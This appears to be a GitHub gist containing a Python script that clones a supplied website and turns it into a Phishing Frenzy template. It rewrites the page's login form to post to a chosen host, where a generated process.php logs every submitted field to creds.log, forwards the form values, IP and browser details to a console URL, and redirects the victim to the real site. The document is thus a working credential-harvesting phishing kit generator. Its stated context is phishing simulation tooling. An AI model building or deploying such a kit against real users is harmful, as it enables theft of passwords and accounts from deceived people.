Last active
January 22, 2016 17:51
-
-
Save milo2012/ed2abbf4f354f713efdf to your computer and use it in GitHub Desktop.
Supply a URL and generate a working cloned website archive that can be readily imported into Phishing Frenzy. Phishing Frenzy 'Clone Website' function still requires additional work to modify the HTML in order to capture the credentials
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re,sys,argparse, commands | |
| try: | |
| from bs4 import BeautifulSoup | |
| except ImportError: | |
| from BeautifulSoup import BeautifulSoup | |
| import zipfile | |
| def generateZIP(): | |
| zipFilename = "template.zip" | |
| print '- Creating archive' | |
| zf = zipfile.ZipFile(zipFilename, mode='w') | |
| try: | |
| zf.write('attachments.yml') | |
| zf.write('template.yml') | |
| zf.write('index.php') | |
| zf.write('process.php') | |
| finally: | |
| zf.close() | |
| print "- Generated zip file: "+zipFilename | |
| print "- You can now import the file in Phishing Frenzy under Templates > Restore" | |
| def generateTemplate(url): | |
| attachmentsText = """--- | |
| - !ruby/object:Attachment | |
| attributes: | |
| id: 60 | |
| file: index.php | |
| attachable_id: 16 | |
| attachable_type: Template | |
| created_at: 2014-09-05 18:03:50.000000000 Z | |
| updated_at: 2014-09-05 18:03:50.000000000 Z | |
| function: website | |
| - !ruby/object:Attachment | |
| attributes: | |
| id: 61 | |
| file: process.php | |
| attachable_id: 16 | |
| attachable_type: Template | |
| created_at: 2014-09-05 18:03:50.000000000 Z | |
| updated_at: 2014-09-05 18:03:50.000000000 Z | |
| function: website""" | |
| templateText = """--- !ruby/object:Template | |
| attributes: | |
| id: 16 | |
| campaign_id: | |
| name: Template1 | |
| description: '[template_name]' | |
| location: | |
| notes: 'ZIP archive contains a readme. You will want to customize the template | |
| to match your organization. The readme will show you exactly where to make changes. ' | |
| created_at: 2014-09-05 17:55:23.000000000 Z | |
| updated_at: 2014-09-05 18:03:50.000000000 Z | |
| directory_index: index.php""" | |
| templateText = templateText.replace("[template_name]",url) | |
| print "- Generated attachments.yml and template.yml" | |
| target = open("attachments.yml", 'w') | |
| target.write(attachmentsText) | |
| target.close() | |
| target = open("template.yml", 'w') | |
| target.write(templateText) | |
| target.close() | |
| def runCommand(fullCmd): | |
| try: | |
| return commands.getoutput(fullCmd) | |
| except: | |
| return "Error executing command %s" %(fullCmd) | |
| def cloneWebsite(url): | |
| print "- Cloning website: "+url | |
| cmd = 'wget --no-check-certificate -O index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36" '+url | |
| runCommand(cmd) | |
| def generatePHP(ipaddr,pfURL): | |
| code = """ | |
| <?php | |
| error_reporting(0); | |
| function clean($string) { | |
| $string = str_replace(' ', '-', $string); // Replaces all spaces with hyphens. | |
| return preg_replace('/[^A-Za-z0-9\-=&]\|/', '', $string); // Removes special chars. | |
| } | |
| $file = 'creds.log'; | |
| $uid = $_POST["uid"]; | |
| $str1 = ''; | |
| foreach ($_POST as $param_name => $param_val) { | |
| if ($param_name != "uid"){ | |
| $str1 = $str1 . $param_name . '=' . $param_val . '|'; | |
| } | |
| } | |
| $formValues = rtrim($str1,'|'); | |
| $formValues = clean($formValues); | |
| file_put_contents($file, print_r($_POST, true), FILE_APPEND); | |
| function get_ip() { | |
| if (function_exists('apache_request_headers')) { | |
| $headers = apache_request_headers(); | |
| } else { | |
| $headers = $_SERVER; | |
| } | |
| if (array_key_exists('X-Forwarded-For',$headers) && filter_var($headers['X-Forwarded-For'],FILTER_VALIDATE_IP,FILTER_FLAG_IPV4)) { | |
| $the_ip = $headers['X-Forwarded-For']; | |
| } elseif (array_key_exists('HTTP_X_FORWARDED_FOR',$headers) && filter_var($headers['HTTP_X_FORWARDED_FOR'],FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) { | |
| $the_ip = $headers['HTTP_X_FORWARDED_FOR']; | |
| } else { | |
| $the_ip = filter_var($_SERVER['REMOTE_ADDR'],FILTER_VALIDATE_IP,FILTER_FLAG_IPV4); | |
| } | |
| return $the_ip; | |
| } | |
| $password = $_POST['PasswordForm']; | |
| $username = $_POST['UsernameForm']; | |
| if ($password != '') { | |
| $creds = 'user:' . $username . ' password:' . $password; | |
| } | |
| $ip = get_ip(); | |
| $browser = $_SERVER['HTTP_USER_AGENT']; | |
| $host = $_SERVER['HTTP_HOST']; | |
| $url = "[phishing-frenzy-url]" . '/reports/results/'; | |
| $data = array('uid' => $uid, 'browser_info' => $browser, 'ip_address' => $ip, 'extra' => "$formValues"); | |
| //echo $data . "<br>"; | |
| // use key 'http' even if you send the request to https://... | |
| $options = array( | |
| 'http' => array( | |
| 'header' => 'Content-type: application/x-www-form-urlencoded', | |
| 'method' => 'POST', | |
| 'content' => http_build_query($data), | |
| ), | |
| ); | |
| $context = stream_context_create($options); | |
| $result = file_get_contents($url, false, $context); | |
| ?> | |
| <meta http-equiv="refresh" content="0; url=[redirect_url]" /> | |
| """ | |
| code = code.replace("[phishing-frenzy-url]",pfURL) | |
| code = code.replace("[redirect_url]",url) | |
| insertJS="<?php $uid = $_GET['uid'];?>" | |
| fname="index.html" | |
| with open(fname) as f: | |
| content = f.readlines() | |
| origHtml="" | |
| for x in content: | |
| x = x.strip() | |
| origHtml+=x | |
| origHtml1=str(BeautifulSoup(origHtml)) | |
| origTag = "" | |
| replaceTag = "" | |
| soup = BeautifulSoup(origHtml) | |
| forms = soup.findAll('form') | |
| for x in forms: | |
| inputs = x.find_all('input') | |
| for y in inputs: | |
| if 'type="password"' in str(y) or "type='password'" in str(y): | |
| origTag = str(y) | |
| replaceTag = str(y)+'<input id="uid" name="uid" type="hidden" value="<?php echo $uid;?>"/>' | |
| origHtml2 = origHtml1.replace(origTag,replaceTag) | |
| origHtml2 = re.sub('action="*"', 'action="http://%s/process.php"' % (ipaddr), origHtml2) | |
| filename = "index.php" | |
| target = open(filename, 'w') | |
| target.write(insertJS+"\n") | |
| target.write(origHtml2) | |
| target.close() | |
| target = open("process.php", 'w') | |
| target.write(code) | |
| target.close() | |
| print "- Generated index.php and process.php" | |
| if __name__ == '__main__': | |
| global filename | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument('-c', action='store', help='[URL of website to clone]') | |
| parser.add_argument('-i', action='store', help='[Domain name where this cloned web will be hosted on]') | |
| parser.add_argument('-u', action='store', help='[URL of phishing frenzy console]') | |
| if len(sys.argv)==1: | |
| parser.print_help() | |
| sys.exit(1) | |
| options = parser.parse_args() | |
| if options.i and options.u and options.c: | |
| url = options.c | |
| cloneWebsite(url) | |
| ipaddr = options.i | |
| pfURL = options.u | |
| generatePHP(ipaddr,pfURL) | |
| generateTemplate(url) | |
| generateZIP() | |
| else: | |
| print "- You must supply -c, -i and -u arguments" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment